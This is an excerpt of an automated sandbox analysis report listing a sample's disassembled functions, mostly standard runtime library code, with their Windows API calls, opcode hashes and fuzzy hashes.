Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_random.jbxd

Similarity

API ID: InfoLocale$ErrorLast
String ID:
API String ID: 661929714-0
Opcode ID: 02a9214e55bc2cab974e0e31b47157bdccd15e0370b8a90781b6737c54b9b7f5
Instruction ID: 323dd3b71e700f10ca5ea538de184b609e98eb650fa5edcbaab26fe71d5a907f
Opcode Fuzzy Hash: 02a9214e55bc2cab974e0e31b47157bdccd15e0370b8a90781b6737c54b9b7f5
Instruction Fuzzy Hash: B1619571A101079FDB25DF28CC82BAA77A8FF19304F10917EEA15FA585E774E980DB50

Function 00E9B4B9 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00E931E1), ref: 00E9B5B1
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00E931E1), ref: 00E9B5BB
UnhandledExceptionFilter.KERNEL32(00E91542,?,?,?,?,?,00E931E1), ref: 00E9B5C8

Memory Dump Source

Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_random.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 6bfc450395070ac78ad1f65446b487a5f05083a0abb49ba2060df8503677c786
Instruction ID: 38fd993ce8cb3609f6af2886c2b12a055741439c8b06e8c58a92310fe4bb86af
Opcode Fuzzy Hash: 6bfc450395070ac78ad1f65446b487a5f05083a0abb49ba2060df8503677c786
Instruction Fuzzy Hash: 7A31C6B4901229ABCF21DF64DD89B8DBBB8BF48310F5052DAE41CA6251E7709B858F44

Function 00EA6F3A Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,?,?,?,00EA6E95,?,?,?,?,?,?,00000000), ref: 00EA7167

Memory Dump Source

Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_random.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 6b49a09fe5d06de4d992908fcb42259c40155a1267bd077677a2029a83729726
Instruction ID: 30c06d6a7346b9134e034fc74acfe0f734ce189f6695f718393102ee2f6eaa85
Opcode Fuzzy Hash: 6b49a09fe5d06de4d992908fcb42259c40155a1267bd077677a2029a83729726
Instruction Fuzzy Hash: C2B16F71614608DFD715CF28C886BA57BE0FF4A368F299658E8D9DF2A1C335E981CB40

Function 00E94C8C Relevance: 1.7, APIs: 1, Instructions: 242COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00E94CA2

Memory Dump Source

Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_random.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: c2b52d52260fc02f7a83e5a58d7720fa1883b543948ce68d02fd86cc7c6af1ca
Instruction ID: cb31fc26088a5067adbe4bbe1ef252e66f8d4fc251ad916ac416b25b9f9db45c
Opcode Fuzzy Hash: c2b52d52260fc02f7a83e5a58d7720fa1883b543948ce68d02fd86cc7c6af1ca
Instruction Fuzzy Hash: 95A19FB2A11A058FDB19CF55E88279ABBF1FB48314F24A63AD415FB3A0C3349945CF90

Function 00EA36A9 Relevance: 1.7, APIs: 1, Instructions: 199fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00E9F807: HeapAlloc.KERNEL32(00000008,?,00E931E1,?,00E9E921,00000001,00000364,00E931E1,00000003,000000FF,?,00E960C1,00E9186C,00E9186A,?,?), ref: 00E9F848

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00EA384A
FindNextFileW.KERNEL32(00000000,?), ref: 00EA393E
FindClose.KERNEL32(00000000), ref: 00EA397D
FindClose.KERNEL32(00000000), ref: 00EA39B0

Memory Dump Source

Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_random.jbxd

Similarity

API ID: Find$CloseFile$AllocFirstHeapNext
String ID:
API String ID: 2701053895-0
Opcode ID: 4cc638422356e14abc3ba933bff1c4b562c727ca5f9e7ebe61d12ecccbe4073e
Instruction ID: 1f8a2996cc9aec50e2d33828332cafc4468804cf4226db9eea73e8271493daa8
Opcode Fuzzy Hash: 4cc638422356e14abc3ba933bff1c4b562c727ca5f9e7ebe61d12ecccbe4073e
Instruction Fuzzy Hash: 4B5149B5900118AFDF14DF788C859BFB7E9DF8A318F14519AF419BB201EA30AE419B60

Function 00EA2FB1 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 00E9E783: GetLastError.KERNEL32(00000000,?,00EA0AB9), ref: 00E9E787
Part of subcall function 00E9E783: SetLastError.KERNEL32(00000000,?,?,00000028,00E9B9D2), ref: 00E9E829

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00EA3005

Memory Dump Source

Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_random.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: ea7a671ef0dced179ee8e835ce1210126e203554fa539968872507f854190160
Instruction ID: 9ba4ca25c785704c1186231bbc74d4064b80b85ca1e63dd46929098d400bbd98
Opcode Fuzzy Hash: ea7a671ef0dced179ee8e835ce1210126e203554fa539968872507f854190160
Instruction Fuzzy Hash: DA219871501206ABDF289B39DC82ABB73E8EF49314B10117AFD01EA145EB74EE409791

Function 00EA30D1 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 00E9E783: GetLastError.KERNEL32(00000000,?,00EA0AB9), ref: 00E9E787
Part of subcall function 00E9E783: SetLastError.KERNEL32(00000000,?,?,00000028,00E9B9D2), ref: 00E9E829

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00EA3125

Memory Dump Source

Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_random.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: af245c363526e54bd2c5d53f8a283746497af64f4fb9e2f6933a991af092947a
Instruction ID: 1bf144ad28b8b5bafc34cf92b72ffc79b8cf68759c53f1dfd27f08b0bd11c90c
Opcode Fuzzy Hash: af245c363526e54bd2c5d53f8a283746497af64f4fb9e2f6933a991af092947a
Instruction Fuzzy Hash: B811E932611216ABDB14DB78DC42ABA77ECEF5A314B10127AF601EB241EB74FE048790

Function 00EA2C64 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00E9E783: GetLastError.KERNEL32(00000000,?,00EA0AB9), ref: 00E9E787
Part of subcall function 00E9E783: SetLastError.KERNEL32(00000000,?,?,00000028,00E9B9D2), ref: 00E9E829

EnumSystemLocalesW.KERNEL32(00EA2CFF,00000001,00000000,?,-00000050,?,00EA2AEF,00000000,-00000002,00000000,?,00000055,?), ref: 00EA2CD6

Memory Dump Source

Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_random.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: ec05e47c0a1962dd7482b540a19ff7799bc1664c5c6330b79853587d4a0091f8
Instruction ID: 21428e7145765e470bc1f559c3047ea73703d518a01e2c58c98b0b302143a9d2
Opcode Fuzzy Hash: ec05e47c0a1962dd7482b540a19ff7799bc1664c5c6330b79853587d4a0091f8
Instruction Fuzzy Hash: 5911253B2003015FDB18AF3DC8916BABB92FF84328B18442CEA46ABB40D371B942C740

Function 00EA327E Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

Part of subcall function 00E9E783: GetLastError.KERNEL32(00000000,?,00EA0AB9), ref: 00E9E787
Part of subcall function 00E9E783: SetLastError.KERNEL32(00000000,?,?,00000028,00E9B9D2), ref: 00E9E829

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00EA2F1B,00000000,00000000,?), ref: 00EA32AA

Memory Dump Source

Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_random.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 70532915c5967007bc37b2d0cdd5c7a89d120efe56645013564b820a80e10525
Instruction ID: a60c934b74907a527869688391355476fea0d2ee62191955777d8a8b6e0d0995
Opcode Fuzzy Hash: 70532915c5967007bc37b2d0cdd5c7a89d120efe56645013564b820a80e10525
Instruction Fuzzy Hash: 34012632600112BFDB185A34C806BFA3B54DB45B18F25052AFC12BB180EA71FF41C6E4

Function 00EA2F52 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00E9E783: GetLastError.KERNEL32(00000000,?,00EA0AB9), ref: 00E9E787
Part of subcall function 00E9E783: SetLastError.KERNEL32(00000000,?,?,00000028,00E9B9D2), ref: 00E9E829

EnumSystemLocalesW.KERNEL32(00EA2FB1,00000001,?,?,-00000050,?,00EA2AB7,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?), ref: 00EA2F9C

Memory Dump Source

Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_random.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 56e960a47367261b7d1f9cfbb0c31cc2cf4474593effca69b0127d92bbbb8133
Instruction ID: d490db967f8b034cb27b53ff09a441a7ab5fe728a79e264d5784ceb22cceb828
Opcode Fuzzy Hash: 56e960a47367261b7d1f9cfbb0c31cc2cf4474593effca69b0127d92bbbb8133
Instruction Fuzzy Hash: B0F0F63A3043045FDB145F399881A7A7BA1EF85768B05842DFA457F680C7B1AC42C650

Function 00E9F717 Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00E9B750: EnterCriticalSection.KERNEL32(-00023A67,?,00E98F5A,00000000,00EB44D8,0000000C,00E98F13,?,?,00E9F83A,?,?,00E9E921,00000001,00000364,00E931E1), ref: 00E9B75F

EnumSystemLocalesW.KERNEL32(00E9F70A,00000001,00EB4928,0000000C,00E9F118,-00000050), ref: 00E9F74F

Memory Dump Source

Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_random.jbxd

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: b7f7d909ca7cb492029f22994b62c5d535e49209971f6950e9a5c0d8d4cbf7ae
Instruction ID: 1711db31b5a0f6a6072f4c863b529489e047e105c6213d255d7637758f3851af
Opcode Fuzzy Hash: b7f7d909ca7cb492029f22994b62c5d535e49209971f6950e9a5c0d8d4cbf7ae
Instruction Fuzzy Hash: 56F0EC76A14304DFDB01DFA9E842B9E77F0EB45721F10526AE415EB2A1CB7959058F80

Function 00EA3086 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00E9E783: GetLastError.KERNEL32(00000000,?,00EA0AB9), ref: 00E9E787
Part of subcall function 00E9E783: SetLastError.KERNEL32(00000000,?,?,00000028,00E9B9D2), ref: 00E9E829

EnumSystemLocalesW.KERNEL32(00EA30D1,00000001,?,?,?,00EA2B11,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?,?), ref: 00EA30BD

Memory Dump Source

Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_random.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 313b5aafe44d7883fa41ac96c04c58b9ff17da320ae5507b6c64337c976cbc03
Instruction ID: 43371b51d8b43e68b637296993eeec9d947d155657dc621b123ba421e93dff80
Opcode Fuzzy Hash: 313b5aafe44d7883fa41ac96c04c58b9ff17da320ae5507b6c64337c976cbc03
Instruction Fuzzy Hash: BEF0E53A7003095BCB04AF3AD88566ABF95EFC6754B074059FA059F251C672AA82C790

Function 00E9F21C Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,00000000,?,00E9A4BC,?,20001004,00000000,00000002,?,?,00E993CE), ref: 00E9F250

Memory Dump Source

Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_random.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: ef62fc98e7f8805c9b6fe10a897ef71136e0890eeed295d6ae6e693ba302c8f3
Instruction ID: 835fe19060c18124e5ba9488de16120b4624c0de51525cd8c4c24c15bed2407a
Opcode Fuzzy Hash: ef62fc98e7f8805c9b6fe10a897ef71136e0890eeed295d6ae6e693ba302c8f3
Instruction Fuzzy Hash: E6E01A36500228BBCF126F61DC06AAE3E55EF44761F004521FD05B5262CB719920AAD5

Function 00E95014 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00005135), ref: 00E95019

Memory Dump Source

Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_random.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 82a2127655e103d9e4f49055889a76e264547d9bc7adbe9613ec10318368b8b8
Instruction ID: da457ebaa162098be828822464db79ef9fcae92dc9af58b295d14a1f82ed7693
Opcode Fuzzy Hash: 82a2127655e103d9e4f49055889a76e264547d9bc7adbe9613ec10318368b8b8
Instruction Fuzzy Hash:

Function 00E9FE2C Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00E9FE2C

Memory Dump Source

Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_random.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 60fe3bb1730e8b0c48e7f8803ad3b5d7740251543b2f709a10c20ea3ab37693d
Instruction ID: 25ab865662dbb62f9044aeba92bd4bb6972a0bb8f4315d455140ee3ea5fd2732
Opcode Fuzzy Hash: 60fe3bb1730e8b0c48e7f8803ad3b5d7740251543b2f709a10c20ea3ab37693d
Instruction Fuzzy Hash: D5A012306011009F43008F33790561A3A9857401803044114A000D0120D72480445F00

Function 00E91000 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_random.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f0e134041470e9fe284de6385fc1cd4d990d422bbc9f06d2e93a1de301e933c
Instruction ID: aab1e81e6bef16e0bd795dad0c35bc6f56f3e4c79100e62f6e2dfa973fd690e2
Opcode Fuzzy Hash: 5f0e134041470e9fe284de6385fc1cd4d990d422bbc9f06d2e93a1de301e933c
Instruction Fuzzy Hash: 71118E32314562079B6C9E289CE503B7B47D7C729832462BDC4229F6D1E533CC43C294

Function 00EAA222 Relevance: 12.2, APIs: 8, Instructions: 248COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCPInfo.KERNEL32(015BFE18,015BFE18,00000000,7FFFFFFF,?,00EAA20D,015BFE18,015BFE18,00000000,015BFE18,?,?,?,?,015BFE18,00000000), ref: 00EAA2C8
__alloca_probe_16.LIBCMT ref: 00EAA383
__alloca_probe_16.LIBCMT ref: 00EAA412
__freea.LIBCMT ref: 00EAA45D
__freea.LIBCMT ref: 00EAA463
__freea.LIBCMT ref: 00EAA499
__freea.LIBCMT ref: 00EAA49F
__freea.LIBCMT ref: 00EAA4AF

Memory Dump Source

Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
